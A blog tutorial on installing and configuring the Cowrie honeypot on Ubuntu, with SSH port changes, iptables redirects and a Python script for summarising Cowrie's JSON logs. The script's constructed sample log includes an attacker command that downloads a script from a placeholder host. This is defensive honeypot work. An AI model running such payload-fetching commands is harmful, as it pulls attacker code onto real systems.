Install And Set Up Cowrie Honeypot On Ubuntu (Linux)

jeremie daniel
Mar 29 · 5 min read

I am using Lubuntu as my OS, and this blog explains what Cowrie is and how to install it.

What is Cowrie?

Cowrie is mostly used to record an attacker's sessions, which gives us a better understanding of the attacker's tools, methods and procedures. Cowrie is a simulation of your server, which means the attacker will think they have hacked/attacked your real server. When an attacker inputs the right data (username or password) to log into your system, the system lets them in without any error, and they have put themselves into a fake system. The honeypot records and tracks what the attacker does, such as their commands and every key typed, and saves everything the attacker downloads. This is a genius way to capture an attacker.

The host's SSH daemon will run on a high port, 22222, Cowrie will run on 2222, and port 22 will be redirected to 2222 using iptables (I have a blog about iptables if you want a better understanding). An SSH bot or attacker that connects to port 22 is then redirected to our honeypot on port 2222.

Requirements and procedures to install cowrie :

Change the Default port 22 to port 22222 :

We are moving the real SSH daemon off port 22 (the default SSH port) so that a bot or attacker connecting to port 22 thinks they have reached a real SSH service. Moving the SSH port on your servers is also a type of defense in itself. The honeypot will make port 2222 act like the real one.

First type in this command to change the port :


sudo code /etc/ssh/sshd_config --user-data-dir /home/[home folder]/
VS Code is my editor, which is why I wrote code; you can use your own editor.

This will open the sshd_config file :

On line 13, I deleted the “#port 22” and replaced it with Port 22222.

Now type in :

systemctl restart ssh
systemctl status ssh

We restart SSH and check its status to see whether it listens on the newly configured port.

It is listening on port 22222.

To see if we are really listening on port 22222, type in:

ssh [your-username]@localhost -p 22222

Now we Install Cowrie Honeypot On Ubuntu/Lubuntu

First we need to update the system :

sudo apt update

Then we install all the dependencies of Cowrie :

sudo apt-get install git python-virtualenv libssl-dev build-essential libpython-dev python2.7-minimal authbind

Then we need to add a user Cowrie :

sudo adduser --disabled-password cowrie

By mistake I had cancelled it, but if you run this command you should get:

Adding user `cowrie' ...
Adding new group `cowrie' (1000) ...
Adding new user `cowrie' (1000) with group `cowrie' ...
Creating home directory `/home/cowrie' ...
Copying files from `/etc/skel' ...
Changing the user information for cowrie
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] Y

You can leave Full Name, etc. blank.

Now let's switch to the cowrie user:

su - cowrie

For the password, if you left it blank just press Enter; otherwise enter your password.
Then, to verify your id, just type in:

id

Now let's download the code for Cowrie (over HTTPS, so the clone cannot be tampered with in transit):

git clone https://github.com/micheloosterhof/cowrie

Now we need to create a virtual environment for Python and Cowrie to run from and activate it:

cd cowrie/
virtualenv cowrie-env
source cowrie-env/bin/activate

Then we need to install the packages of Python that Cowrie needs to run :

pip install --upgrade pip
pip install --upgrade -r requirements.txt

Now we need to configure the Cowrie daemon :

cd etc/
cp cowrie.cfg.dist cowrie.cfg

This creates a config file that we can edit. Then use an editor to open this file:

nano cowrie.cfg

After that, we edit this file, changing the hostname first, as this will make the attacker think they are in our server without us knowing:

Change the hostname from svr04 to testserver5:

Then we need to enable telnet :

In this file (cowrie.cfg) there are many options to play with, from logging and alerting to fake address and file downloads.

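Finally, we are ready to start the daemon:

From the netstat output, we can see the SSH and Telnet daemons of our honeypot listening on ports 2222 and 2223 respectively.

Then we need to redirect traffic from ports 22 and 23 to the high ports 2222 and 2223 using iptables. These rules must be added as root, and because they sit in the PREROUTING chain they apply to connections arriving from other hosts, not to connections made from the honeypot machine itself:

iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
iptables -t nat -A PREROUTING -p tcp --dport 23 -j REDIRECT --to-port 2223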

To follow what is happening in the honeypot as it happens, type in:

tail -f log/cowrie.log

To read the whole log of your honeypot, write:

cat log/cowrie.log

From now on you can read the logs and see the commands run within your honeypot.
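Cowrie can also write the same events as one JSON object per line (typically cowrie.json, next to cowrie.log), which is easier to process than the text log. The script below is an added example, not part of the original post or of Cowrie itself: it groups events by session and picks out the sessions where a login succeeded. The log lines are constructed, and the event and field names are assumed to match the JSON output of your Cowrie version.

```python
import json
from collections import defaultdict

# Constructed sample lines (not real traffic); IPs are from the documentation range.
SAMPLE_LOG = """\
{"eventid": "cowrie.login.failed", "session": "a1b2c3d4", "src_ip": "203.0.113.7", "username": "root", "password": "123456"}
{"eventid": "cowrie.login.success", "session": "a1b2c3d4", "src_ip": "203.0.113.7", "username": "root", "password": "password"}
{"eventid": "cowrie.command.input", "session": "a1b2c3d4", "src_ip": "203.0.113.7", "input": "uname -a"}
{"eventid": "cowrie.command.input", "session": "a1b2c3d4", "src_ip": "203.0.113.7", "input": "wget http://example.invalid/x.sh"}
{"eventid": "cowrie.session.file_download", "session": "a1b2c3d4", "url": "http://example.invalid/x.sh", "shasum": "CONSTRUCTED-SHA256"}
this line is not JSON
{"eventid": "cowrie.login.failed", "session": "e5f6a7b8", "src_ip": "203.0.113.9", "username": "admin", "password": "admin"}
"""

def summarize(lines):
    """Group Cowrie events by session id; count lines that cannot be used."""
    sessions = defaultdict(lambda: {"src_ip": None, "failed": 0, "logins": [],
                                    "commands": [], "downloads": []})
    skipped = 0
    for line in lines:
        if not line.strip():
            continue
        try:
            ev = json.loads(line)
        except ValueError:  # truncated or non-JSON line, e.g. a partial write
            ev = None
        if not isinstance(ev, dict) or "session" not in ev:
            skipped += 1
            continue
        s = sessions[ev["session"]]
        s["src_ip"] = ev.get("src_ip") or s["src_ip"]
        kind = ev.get("eventid")
        if kind == "cowrie.login.failed":
            s["failed"] += 1
        elif kind == "cowrie.login.success":
            s["logins"].append((ev.get("username"), ev.get("password")))
        elif kind == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
        elif kind == "cowrie.session.file_download":
            s["downloads"].append((ev.get("url"), ev.get("shasum")))
    return dict(sessions), skipped

def interactive(sessions):
    """Session ids with a successful login: the ones worth reading first."""
    return sorted(sid for sid, s in sessions.items() if s["logins"])

if __name__ == "__main__":
    sessions, skipped = summarize(SAMPLE_LOG.splitlines())
    print({sid: sessions[sid] for sid in interactive(sessions)}, "unparsed:", skipped)
```

To run it on a real log, pass an open file object to summarize() instead of the sample string.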

Thank you for reading my blog.
If you have any suggestions, tell me.
